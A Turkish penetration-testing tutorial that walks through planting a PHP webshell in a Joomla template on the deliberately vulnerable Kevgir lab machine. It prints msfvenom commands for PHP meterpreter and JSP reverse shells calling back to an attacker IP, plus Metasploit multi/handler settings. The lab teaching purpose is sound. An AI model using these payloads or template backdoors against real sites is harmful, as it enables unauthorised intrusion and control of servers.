Erişim Sağlanan Jooma Yönetim Arayüzünde MsfVenom ile Oluşturulan PHP Kodunun Gömülerek İşletim Sistemine Erişim Sağlanması

Web uygulaması sızma testleri sırasında erişilen web uygulaması üzerinden işletim sisteminde kod çalıştırılabilir. Bu yazıda yönetici hakları ile erişim sağlanan Joomla yönetim arayüzü MsfVenom aracı ile hazırlanan bir PHP kodunun (webshell backdoor) hedefe şablon olarak yüklenmesi yolu ile istismar edilecek ve işletim sistemine Meterpreter ile erişim sağlanacaktır.

Yazıda kullanılan Kevgir sanal makinesi https://canyoupwn.me/kevgir-vulnerable-vm/ bağlantısından indirilebilir. Joomla uygulamasına yönetici olarak erişim sağlandıktan sonra işletim sisteminde kod çalıştırabilmek için şablon yönetimindeki (“Extensions > Template Manager“) zafiyet istismar edilecektir.

 

Zafiyet istismarı için şablon seçilir.

 

Şablonun HTML kodu düzenlenir.

 

HTML kodu varsayılan olarak aşağıdaki gibidir. Bu kod silinerek yerine yeni bir kod eklenecektir.

 

Hedef sistemin saldırgan bilgisayarına (100.100.200.210) erişim sağlaması için msfvenom ile yeni bir payload hazırlanır.

ifconfig eth0
msfvenom -p php/meterpreter/reverse_tcp LHOST=100.100.200.210 LPORT=11223 -f raw

 

Not: Payload olarak JSP de kullanılabilirdi:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=100.100.200.210 LPORT=11223 -f war > /root/Desktop/kabuk.war

 

Hazırlanan bu kodun turuncu ile belirtilen alanı (başındaki “/*” kısmı alınmaz) kopyalanır ve şablon kodunun bulunduğu alana yapıştırılır. Sonrasında da şablon kaydedilir.

 

Şablonun başarılı bir şekilde kaydedildiği görülür.

 

Sayfa çağırıldığında msfvenom ile hazırlanan kod çalışacak ve ters bağlantı talebi oluşacaktır. Bu bağlantının yakalanması içinm saldırgan bilgisayarında multi/handler modülü başlatılır.

use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 100.100.200.210
set LPORT 11223
exploit -j

 

Şablon ön izlemeye alındığında yazılı olan kod parçacığı çalışacaktır.

 

Böylece saldırgan tarafında Meterpreter talebi yakalanmış olacaktır.

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.